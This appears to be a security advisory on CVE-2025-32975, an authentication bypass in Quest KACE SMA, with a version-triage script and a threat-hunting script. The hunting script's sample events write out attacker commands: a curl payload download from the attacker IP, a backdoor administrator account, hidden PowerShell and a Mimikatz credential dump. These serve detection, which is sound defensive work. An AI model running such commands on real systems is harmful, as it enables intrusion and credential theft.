CVE-2025-32975

Quest KACE SMA — Unauthenticated SSO Authentication Bypass Enabling Full Administrative Takeover
🔥 CVSS 3.1  10 / 10 — CRITICAL 🔴 CISA Known Exploited Vulnerability

What is Quest KACE SMA?

Quest KACE Systems Management Appliance (SMA) is an on-premises IT endpoint management platform widely deployed in enterprise, government, healthcare, and education environments. It provides centralized inventory, software deployment, patch management, OS imaging, and monitoring across Windows, macOS, and Linux endpoints — often managing thousands of devices from a single web-based console. Because KACE SMA holds administrative credentials and has the ability to remotely execute code on every managed device, it represents a highly valuable target: compromising the appliance can provide an attacker with effectively unlimited lateral movement across the entire managed endpoint estate.

KACE SMA is typically exposed to internal networks, and in some configurations to the internet, for remote management purposes.

Overview

🔥 Maximum Severity — Actively Exploited. This vulnerability carries a CVSS score of 10.0, the highest possible, and was added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on April 20, 2026 with a remediation deadline of May 4, 2026. Active exploitation was observed by Arctic Wolf starting the week of March 9, 2026. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2025-32975 is a maximum-severity authentication bypass in the Single Sign-On (SSO) authentication handling mechanism of Quest KACE SMA. An unauthenticated remote attacker can exploit a flaw in how the appliance processes SSO authentication requests to impersonate any legitimate user, including administrator accounts, without possessing valid credentials. Successful exploitation results in complete administrative takeover of the appliance and, by extension, command execution capability on every device it manages.

Affected Versions

Status       Quest KACE SMA version
Vulnerable   13.0.x prior to 13.0.385
Vulnerable   13.1.x prior to 13.1.81
Vulnerable   13.2.x prior to 13.2.183
Vulnerable   14.0.x prior to 14.0.341 (Patch 5)
Vulnerable   14.1.x prior to 14.1.101 (Patch 4)
Fixed        13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), 14.1.101 (Patch 4)
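The table above is easy to misread at fleet scale, where each appliance reports a build number and there are five separate branches to compare against. The following is an added example (not Quest's tooling or code from this advisory) that classifies appliance version strings against the fixed builds listed above. It assumes the appliance reports a dotted numeric version such as 14.0.320 (the "(Patch N)" labels are not parsed), and the inventory it runs over is constructed for illustration.

```python
import re

# Fixed builds per branch, as listed in the advisory's Affected Versions table.
FIXED_BUILDS = {
    (13, 0): (13, 0, 385),
    (13, 1): (13, 1, 81),
    (13, 2): (13, 2, 183),
    (14, 0): (14, 0, 341),   # Patch 5
    (14, 1): (14, 1, 101),   # Patch 4
}

# Constructed inventory (hostname -> reported version); not real hosts.
SAMPLE_INVENTORY = {
    "kace-hq": "14.1.99",
    "kace-lab": "14.0.341",
    "kace-eu": "13.2.180",
    "kace-old": "12.1.169",
}


def parse_version(s):
    """Parse 'major.minor.build' into an int tuple; trailing components are ignored.
    Assumption: the appliance reports a dotted numeric version string."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", s)
    if not m:
        raise ValueError(f"unrecognised version string: {s!r}")
    return tuple(int(x) for x in m.groups())


def assess(version):
    """Return 'vulnerable', 'fixed' or 'unlisted' for one KACE SMA version string.

    'unlisted' means the major.minor branch is not in the advisory's table, so the
    result must be confirmed against the vendor KB rather than assumed safe."""
    v = parse_version(version)
    fixed = FIXED_BUILDS.get(v[:2])
    if fixed is None:
        return "unlisted"
    return "fixed" if v >= fixed else "vulnerable"


def triage(inventory):
    """Group a {hostname: version} inventory by status so patch work can be prioritised."""
    out = {"vulnerable": [], "fixed": [], "unlisted": []}
    for host, ver in inventory.items():
        out[assess(ver)].append(host)
    return out


if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status:<11} {', '.join(hosts) or '-'}")
```

Treat "unlisted" as a work item, not a pass: a branch outside the table may be end-of-life or covered by a different vendor notice.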

Technical Details

The vulnerability exists in KACE SMA's SSO authentication handling mechanism. SSO implementations typically allow users to authenticate via an external identity provider (IdP) by presenting a token or assertion that the appliance validates. The flaw in KACE SMA's SSO handler allows an attacker to craft or manipulate the authentication assertion in a way that the appliance accepts as valid for any specified username — bypassing the credential verification step entirely.

The resulting access is equivalent to logging in as the targeted user. When targeting an administrator account, the attacker gains full administrative control over the KACE SMA console.

What a fully compromised KACE SMA enables:

  • Execute arbitrary commands on all managed endpoints via KACE's built-in scripting and software deployment features
  • Create new administrator accounts for persistent access
  • Access all managed device inventories, credentials, and configurations
  • Deploy malware, ransomware, or persistent implants across the entire managed device fleet
  • Exfiltrate sensitive configuration data and credentials stored in the appliance

Attack characteristics:

  • Authentication required: None
  • Attack complexity: Low
  • Network-accessible: Yes
  • User interaction: None
  • Scope: Changed (impact extends beyond the appliance to all managed endpoints)

Discovery

CVE-2025-32975 was discovered by Philippe Caturegli and Mohamed Mahmoudi of Seralys, who submitted the vulnerability report to Quest Software on April 14, 2025. Quest acknowledged receipt the same day, coordinated a fix, and released a public hotfix on May 27, 2025 — approximately six weeks after initial report. Seralys published a high-level public advisory on June 23, 2025, withholding detailed technical information and proof-of-concept code pending broader patch adoption.

Exploitation Context

Beginning the week of March 9, 2026, Arctic Wolf researchers observed active exploitation of unpatched KACE SMA systems exposed to the internet. Threat actors leveraged CVE-2025-32975 to gain initial access and then executed a multi-stage post-exploitation campaign:

Observed attacker actions:

  • Executed remote commands to download Base64-encoded payloads from attacker-controlled server 216.126.225[.]156 via curl
  • Used runkbot.exe (a legitimate KACE background process for running scripts) to create additional administrator accounts
  • Executed PowerShell scripts in hidden contexts to modify Windows Registry keys for persistence
  • Deployed Mimikatz for credential harvesting
  • Performed Active Directory enumeration to map domain structure
  • Conducted lateral movement to backup infrastructure and domain controllers

The attack pattern represents a full enterprise compromise chain: authentication bypass → admin takeover of management appliance → lateral movement to backup systems and domain controllers via the appliance's trusted management access.

The end goal of the attacks was not publicly confirmed at time of reporting, but the TTPs are consistent with pre-ransomware staging or espionage.

Remediation

CISA BOD 22-01 Deadline: May 4, 2026. Apply the vendor patch immediately. Organizations with KACE SMA exposed to the internet should assume compromise and conduct a thorough investigation, including reviewing for unauthorized admin accounts and lateral movement indicators.

  1. Apply the Quest patch immediately — upgrade to the fixed version for your branch: 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), or 14.1.101 (Patch 4). See Quest KB4379499 for details.
  2. Remove KACE SMA from public internet exposure — place it behind a VPN or firewall. The appliance should never be directly internet-accessible.
  3. Audit administrator accounts — review all administrator accounts in the KACE SMA console and remove any unauthorized or unrecognized accounts immediately.
  4. Review scripting and deployment history — check the KACE SMA audit log and scripting history for any unauthorized script executions, software deployments, or configuration changes during the exposure window.
  5. Hunt for compromise indicators: look for runkbot.exe with unusual arguments, PowerShell invocations in hidden windows, unexpected outbound connections (particularly to 216.126.225[.]156), new local/domain administrator accounts, and Mimikatz artifacts on managed endpoints.
  6. Rotate credentials: if the appliance has been exposed to the internet since before May 27, 2025 (the patch release date), treat all KACE SMA credentials and any credentials accessible via managed endpoints as potentially compromised.
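Step 5 lists the indicators to hunt for but not how to run that hunt over exported endpoint telemetry. The following is an added example (not Arctic Wolf's, Quest's or this advisory's code) that applies those indicators as simple rules to JSON-lines process and network events. The event shape and field names are an assumption to be mapped onto your EDR or SIEM export; the sample events are constructed, including a benign runkbot.exe-driven MSI install to show that the rules key on a shell or PowerShell being spawned by runkbot.exe rather than on the process itself; and the only real indicator is the 216.126.225.156 address from the advisory, refanged.

```python
import json
import re

# Constructed sample telemetry (not real captures): one JSON object per line in a
# generic process/network event shape. Field names are an assumption.
SAMPLE_EVENTS = r"""
{"type":"process","host":"ws-042","parent":"runkbot.exe","image":"cmd.exe","cmdline":"cmd.exe /c net user svc_bkp Pa55w0rd /add && net localgroup administrators svc_bkp /add"}
{"type":"process","host":"ws-042","parent":"runkbot.exe","image":"powershell.exe","cmdline":"powershell.exe -WindowStyle Hidden -EncodedCommand BASE64PLACEHOLDER"}
{"type":"process","host":"ws-042","parent":"cmd.exe","image":"curl.exe","cmdline":"curl.exe -s http://216.126.225.156/p.b64 -o C:\\Windows\\Temp\\p.b64"}
{"type":"network","host":"ws-042","image":"curl.exe","dst_ip":"216.126.225.156","dst_port":80}
{"type":"process","host":"ws-042","parent":"cmd.exe","image":"mimikatz.exe","cmdline":"mimikatz.exe \"sekurlsa::logonpasswords\" exit"}
{"type":"process","host":"ws-017","parent":"runkbot.exe","image":"msiexec.exe","cmdline":"msiexec.exe /i C:\\ProgramData\\Quest\\KACE\\downloads\\agent.msi /qn"}
{"type":"network","host":"ws-017","image":"chrome.exe","dst_ip":"198.51.100.7","dst_port":443}
"""

# Indicator from the advisory (published defanged as 216.126.225[.]156).
KNOWN_C2_IPS = {"216.126.225.156"}

# Shells that runkbot.exe would not normally need to spawn (assumption used to
# approximate the advisory's "runkbot.exe with unusual arguments").
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

HIDDEN_PS = re.compile(r"-w\w*\s+hidden\b", re.I)          # -w hidden, -WindowStyle Hidden
ADD_ACCOUNT = re.compile(
    r"\bnet1?(?:\.exe)?\s+(?:user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)",
    re.I,
)
MIMIKATZ = re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I)


def _cmd(e):
    return e.get("cmdline", "")


def _is_proc(e):
    return e.get("type") == "process"


RULES = [
    ("runkbot_spawned_shell", lambda e: _is_proc(e)
        and e.get("parent", "").lower() == "runkbot.exe"
        and e.get("image", "").lower() in SHELLS),
    ("hidden_powershell", lambda e: _is_proc(e) and bool(HIDDEN_PS.search(_cmd(e)))),
    ("admin_account_added", lambda e: _is_proc(e) and bool(ADD_ACCOUNT.search(_cmd(e)))),
    ("mimikatz_artifact", lambda e: _is_proc(e) and bool(MIMIKATZ.search(_cmd(e)))),
    # Fires on a network event to the IoC, or on a command line that embeds it.
    ("known_c2_contact", lambda e: e.get("dst_ip") in KNOWN_C2_IPS
        or any(ip in _cmd(e) for ip in KNOWN_C2_IPS)),
]


def hunt(raw_events):
    """Return (rule, host, image, detail) hits over JSON-lines telemetry.
    Malformed lines are skipped so one bad export line does not abort the hunt."""
    hits = []
    for line in raw_events.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            e = json.loads(line)
        except json.JSONDecodeError:
            continue
        for name, match in RULES:
            if match(e):
                detail = e.get("cmdline") or e.get("dst_ip", "")
                hits.append((name, e.get("host", "?"), e.get("image", "?"), detail))
    return hits


def hosts_by_rule(hits):
    """Collapse hits into {rule: sorted hosts} so a fleet-wide result is readable."""
    out = {}
    for name, host, _, _ in hits:
        out.setdefault(name, set()).add(host)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for rule, hosts in hosts_by_rule(hunt(SAMPLE_EVENTS)).items():
        print(f"{rule:<24} {', '.join(hosts)}")
```

A host that trips several rules in sequence (shell spawned by runkbot.exe, account creation, contact with the known address, credential dumping) matches the chain described in Exploitation Context and should be escalated ahead of single-rule hits.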

Key Details

Property              Value
CVE ID                CVE-2025-32975
Vendor / Product      Quest — KACE Systems Management Appliance (SMA)
NVD Published         2025-06-24
NVD Last Modified     2026-04-21
CVSS 3.1 Score        10.0
CVSS 3.1 Vector       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Severity              CRITICAL
CWE                   CWE-287 — Improper Authentication
CISA KEV Added        2026-04-20
CISA KEV Deadline     2026-05-04
Known Ransomware Use  No

CVSS 3.1 Breakdown

Attack Vector         Network
Attack Complexity     Low
Privileges Required   None
User Interaction      None
Scope                 Changed
Confidentiality       High
Integrity             High
Availability          High

Required Action

CISA BOD 22-01 Deadline: 2026-05-04. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Timeline

Date        Event
2025-04-14  Philippe Caturegli and Mohamed Mahmoudi (Seralys) submit vulnerability report to Quest Software
2025-05-08  Quest shares preliminary hotfix with Seralys for validation
2025-05-17  Seralys confirms hotfix addresses the vulnerability
2025-05-27  Quest publicly releases hotfix for CVE-2025-32975
2025-06-23  Seralys publishes high-level public disclosure
2025-06-24  CVE-2025-32975 formally published on NVD
2026-03-09  Arctic Wolf observes active exploitation of unpatched KACE SMA systems beginning this week
2026-04-20  Added to CISA Known Exploited Vulnerabilities catalog
2026-05-04  CISA BOD 22-01 remediation deadline